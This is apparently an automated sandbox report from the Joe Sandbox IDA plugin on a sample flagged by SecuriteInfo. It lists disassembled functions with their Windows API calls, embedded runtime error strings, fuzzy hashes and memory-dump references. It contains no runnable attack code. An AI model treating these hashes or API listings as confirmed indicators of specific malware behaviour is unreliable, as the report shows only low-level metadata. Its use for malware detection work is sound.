Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96cd8bba661d24d99beecd03a5742d3380a8c45a3cba203c78bfa62990599cb4
Instruction ID: 602ae223747aca4cf7ad883d9b3a43d88c16a7a8c6d1002665952f6d7fa1eaec
Opcode Fuzzy Hash: 96cd8bba661d24d99beecd03a5742d3380a8c45a3cba203c78bfa62990599cb4
Instruction Fuzzy Hash: EAA002B735550207F76A0008DC43B811105DB48315F9C91642818CA280E14DCCD05018

Function 002CC650 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 325COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 002CC80A
GetFullPathNameW.KERNEL32 ref: 002CC81F
GetLastError.KERNEL32 ref: 002CC82A
GetLastError.KERNEL32 ref: 002CC843

Strings

\\?\\\?\UNC\, xrefs: 002CC8B7
appdata, xrefs: 002CC653

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$FullNamePath
String ID: \\?\\\?\UNC\$appdata
API String ID: 2482867836-3357109634
Opcode ID: db9139a5b54f316676feeaf5c6dd963c510de4c2574a4cc0f1f758acdbbabd93
Instruction ID: c8cb4fd9fff2a8c4d7579068aab3ecd44a94c0afe4eaff3b0a43f59dc154ceea
Opcode Fuzzy Hash: db9139a5b54f316676feeaf5c6dd963c510de4c2574a4cc0f1f758acdbbabd93
Instruction Fuzzy Hash: A5C1EF62620BD185CB319F61D848BBD7368F305B98F64831AEE5D8B789DF74CAA5C300

Function 002D2630 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 002D2703
abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,002AA71B), ref: 002D2709
RtlUnwindEx.KERNEL32 ref: 002D2818

Strings

CCG!, xrefs: 002D26F1
CCG", xrefs: 002D2691
CCG!, xrefs: 002D2659
CCG , xrefs: 002D269D

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: 34dc56733007f9fd3c55d28220b4e5370bce957e66330a88e271d286e1120c74
Instruction ID: 6fa1cf34942ba3e17cde8134657489eb3cba6ce224bfa7c2299d4e0aeef44bd7
Opcode Fuzzy Hash: 34dc56733007f9fd3c55d28220b4e5370bce957e66330a88e271d286e1120c74
Instruction Fuzzy Hash: 19516A76224B80C6D7208F55E8807AEB3B5F399B98F645116EF8D47B18CF39C9A6C740

Function 002ACA20 Relevance: 12.7, APIs: 10, Instructions: 181COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 002ACA70
TlsSetValue.KERNEL32 ref: 002ACA81
TlsGetValue.KERNEL32 ref: 002ACAD0
TlsSetValue.KERNEL32 ref: 002ACAE1
TlsGetValue.KERNEL32 ref: 002ACB30
TlsSetValue.KERNEL32(?), ref: 002ACB41
TlsGetValue.KERNEL32 ref: 002ACB90
TlsSetValue.KERNEL32(?,?), ref: 002ACBA1
TlsGetValue.KERNEL32 ref: 002ACBDC
TlsSetValue.KERNEL32(?,?), ref: 002ACBED

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7851064097a3cfe09f52e595153435b02b94279ce94f90271a7570efdee0cb97
Instruction ID: eeed9fee422239c00f5089d108467083f67859bbbb3114578baa03c898d641c2
Opcode Fuzzy Hash: 7851064097a3cfe09f52e595153435b02b94279ce94f90271a7570efdee0cb97
Instruction Fuzzy Hash: 4051373272669187DB199F12962137C6762BB57F94F2C8466CE0E27301DF35DCB28394

Function 002D30F0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 002D3209

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 002D335B
VirtualProtect failed with code 0x%x, xrefs: 002D32F6
Mingw-w64 runtime failure:, xrefs: 002D3128
Address %p has no image-section, xrefs: 002D3160

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: ae1c215c02d1b970cd01d8be6aefa92eb4b93aea2c60055b4fe325c5fc9b605d
Instruction ID: cf24f8d5179d732f18839708204228b73d24cb3152fe6a908713c68429b1b051
Opcode Fuzzy Hash: ae1c215c02d1b970cd01d8be6aefa92eb4b93aea2c60055b4fe325c5fc9b605d
Instruction Fuzzy Hash: 1951F333761B8186DB10DF16F84875977A4F7997A4F448227EF9D03390EA38CAA5C700

Function 002CC020 Relevance: 9.2, APIs: 6, Instructions: 173COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AFE45), ref: 002CC236
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AFE45), ref: 002CC251
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AFE45), ref: 002CC264

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$CloseHandle
String ID:
API String ID: 3463825546-0
Opcode ID: cddee2f21e29cf423b486a8f27a85187065b7977aef0d6eeede48e089fd64c65
Instruction ID: 994c0a22271ffe4d741f3788faaaeac898beb4f8fe174fce97ef6bb4d9677d92
Opcode Fuzzy Hash: cddee2f21e29cf423b486a8f27a85187065b7977aef0d6eeede48e089fd64c65
Instruction Fuzzy Hash: 02515C6273429186FB25CE62D605B6A2690B7457D4F38431DCE8E47BC6D7F9C8B5C301

Function 002AFDF0 Relevance: 9.1, APIs: 6, Instructions: 147fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 002AFF86
MapViewOfFile.KERNEL32 ref: 002AFFA6
CloseHandle.KERNEL32 ref: 002AFFB1
CloseHandle.KERNEL32 ref: 002AFFDA
CloseHandle.KERNEL32 ref: 002AFFF0

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandle$File$CreateMappingView
String ID:
API String ID: 1771758222-0
Opcode ID: 6d23f2a262bb6bcd81b6c59ee033bbabfd0b3d40b67309b0f854d42c6b8bc101
Instruction ID: 55a1f6223fb52dce76dc9ad22cb402904c0e10f2d5fa06156fbfc658ec369c50
Opcode Fuzzy Hash: 6d23f2a262bb6bcd81b6c59ee033bbabfd0b3d40b67309b0f854d42c6b8bc101
Instruction Fuzzy Hash: E351B03272075186EB64DFA2E65476D67A0B786B88F18802ADE4947B85DF7CC4A6C700

Function 002D3980 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 002D3A2A

Strings

CCG , xrefs: 002D3996

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: b2c6dc9096ae1f9aa773ffe311f885973a27ba10920ca0db3dbc828a38cb8965
Instruction ID: 151758aec83594dbd965dafe7f55a067df940cb36b41ca3d7940700b1e03cdd3
Opcode Fuzzy Hash: b2c6dc9096ae1f9aa773ffe311f885973a27ba10920ca0db3dbc828a38cb8965
Instruction Fuzzy Hash: 5121F06173458252EF38DA79C86237812019B49374F294B17D97DC73E4DEA9CEE18303

Function 002CCD20 Relevance: 7.7, APIs: 5, Instructions: 214COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 002CCE8A
GetEnvironmentVariableW.KERNEL32 ref: 002CCE9C
GetLastError.KERNEL32 ref: 002CCEA8
GetLastError.KERNEL32 ref: 002CCEC1

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$EnvironmentVariable
String ID:
API String ID: 2691138088-0
Opcode ID: 8abd1b96f6ffbdccb99d18eedcbe15bbc4f4e10eb1b0d5ca2c732887a0dbb931
Instruction ID: 0f569872324b0ea5434b2385d281dd18a4cc7cd63d82ea912f104a8528f8d94f
Opcode Fuzzy Hash: 8abd1b96f6ffbdccb99d18eedcbe15bbc4f4e10eb1b0d5ca2c732887a0dbb931
Instruction Fuzzy Hash: FC81F222720BC186DB359F25D8457ED2365F785BC8F64422ADE1E5BB89CF78C6A2C300

Function 002AC560 Relevance: 7.6, APIs: 6, Instructions: 115COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 002AC582
TlsGetValue.KERNEL32 ref: 002AC5D2
TlsSetValue.KERNEL32(?,?,00000000,?,002AC741), ref: 002AC5E2
TlsGetValue.KERNEL32 ref: 002AC64F
TlsGetValue.KERNEL32 ref: 002AC683
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,002AC741), ref: 002AC693

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: ffb944a7ba81d4207274960d1730fe262e32b477ac5d9a27ad14fc8042fabc03
Instruction ID: 0583d8611ca6b8cfa99d9124da4f81709318817a0f37feed03103128a3e02c8c
Opcode Fuzzy Hash: ffb944a7ba81d4207274960d1730fe262e32b477ac5d9a27ad14fc8042fabc03
Instruction Fuzzy Hash: 98312632B3165087DE29AF169A0436D5359A7CAFD0FAC8436AE0D57740DE68CC658B80

Function 002A3DD0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 188COMMON

Download Yara Rule

Strings

}0x, xrefs: 002A4044
ParseIntError, xrefs: 002A3FDA
kindmessageKindErrorCustomerror (os error ), xrefs: 002A4001

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: }0x$ParseIntError$kindmessageKindErrorCustomerror (os error )
API String ID: 0-1900568752
Opcode ID: 87f27eb610d10f7b54759e6b5760645ba624286ce07e0f9d469741830788810a
Instruction ID: f0f8e17e7d93a8e18657a7ee82088b093d7615f878c06994c79630f09f0ac7f4
Opcode Fuzzy Hash: 87f27eb610d10f7b54759e6b5760645ba624286ce07e0f9d469741830788810a
Instruction Fuzzy Hash: EA51DEA2B30BA59AEB14DF61E8007A97B75F346B88F54411AEF4D57B04DF74CAA6C300

Function 002D28B0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 002D2935
RtlUnwindEx.KERNEL32 ref: 002D2953
abort.MSVCRT ref: 002D2959
abort.MSVCRT ref: 002D2970

Part of subcall function 002D2850: RaiseException.KERNEL32 ref: 002D289B

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: abort$CaptureContextExceptionRaiseUnwind
String ID:
API String ID: 4122134289-0
Opcode ID: 2d41799b5a6f560282747668a07ab79b69b94f7653e47878a1b2f2c31c0c17ba
Instruction ID: 6a0f7f06b61899cd7aae41c8344664267e384dac6509d7c71c2708ff802c601d
Opcode Fuzzy Hash: 2d41799b5a6f560282747668a07ab79b69b94f7653e47878a1b2f2c31c0c17ba
Instruction Fuzzy Hash: 08113A72624BC8C5DB209F65E84439AB7A5F398BD4F541126EF8D43B58CF78C56ACB00

Function 002D3370 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 002D3634
Unknown pseudo relocation protocol version %d., xrefs: 002D3648

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 0-395989641
Opcode ID: 5e19c8390051cb2784b4b55d448f8d48a09f4e2bb34c71610d91828d2c3b458c
Instruction ID: e4447f02e57357165f31c5ce561a9a3eb9dd9b43769e0179853a50cea3386852
Opcode Fuzzy Hash: 5e19c8390051cb2784b4b55d448f8d48a09f4e2bb34c71610d91828d2c3b458c
Instruction Fuzzy Hash: D2713372B20B8486DB10DF65E84479D7761F719BA8F588213DE1C07B98DB38CA60CB42

Function 002D007E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32 ref: 002D0096
CloseHandle.KERNEL32 ref: 002D009E

Strings

s [... omitted frame ...], xrefs: 002D021B

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: CloseFileHandleUnmapView
String ID: s [... omitted frame ...]
API String ID: 2381555830-3732609013
Opcode ID: a927be645e53ddca24f279b4e4f60cca0b5ba11800129d0781871fbf9eb9e9df
Instruction ID: 9ccbdf68c1741342d61f74ab19413a75795a1bf6535c40d04e7c55e81bd03926
Opcode Fuzzy Hash: a927be645e53ddca24f279b4e4f60cca0b5ba11800129d0781871fbf9eb9e9df
Instruction Fuzzy Hash: EA517D72625B8089EB61CF25E8843ED3B60F348B98F584126EF4E47B65DF38C9A5C740

Function 002D3160 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 002D3209

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 002D335B
Address %p has no image-section, xrefs: 002D3160, 002D3345

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 1804819252-157664173
Opcode ID: ec8840ad5822ded08d413ae8c9348989ede775e798ba79f284f303dba107ae72
Instruction ID: 112f91de0f76a905c82097c7caea578588e19a3b1814c95070085be9e742bf7d
Opcode Fuzzy Hash: ec8840ad5822ded08d413ae8c9348989ede775e798ba79f284f303dba107ae72
Instruction Fuzzy Hash: 95312473B22A8196EE11DF1AFD097983724B795BA4F488127DE5C07390DE38CE96C741

Function 002D2FE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 002D3060

Strings

Unknown error, xrefs: 002D30CC
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 999b21b3e421786fa0ae8a8f3ec2d08227aaf71e2200d13a4ba6fd673149a473
Instruction ID: d3abdd8cfd7a3a716a1fc307acb3fe47afd23223fcf9c6153da8a0b0e23a73a6
Opcode Fuzzy Hash: 999b21b3e421786fa0ae8a8f3ec2d08227aaf71e2200d13a4ba6fd673149a473
Instruction Fuzzy Hash: D8012563958F84C3D705DF18D8003AA7331FBAE749F259316EB8D26615DB35D5A2C700

Function 002D30A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 002D3060

Strings

Overflow range error (OVERFLOW), xrefs: 002D30A0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 3f5c96346864f723ad26de432a75bfa86a9143ad0f692a433a492a73e22c18f8
Instruction ID: 4728b3d4cfdf45339dc0d08fda599cfac988e8656be4e0c6552a45534949a312
Opcode Fuzzy Hash: 3f5c96346864f723ad26de432a75bfa86a9143ad0f692a433a492a73e22c18f8
Instruction Fuzzy Hash: 40F03663954E8482D202DF2CE8003AB7330FB9E799F255316EF8D26615DF24D5929700

Function 002D30B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 002D3060

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047
The result is too small to be represented (UNDERFLOW), xrefs: 002D30B0

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

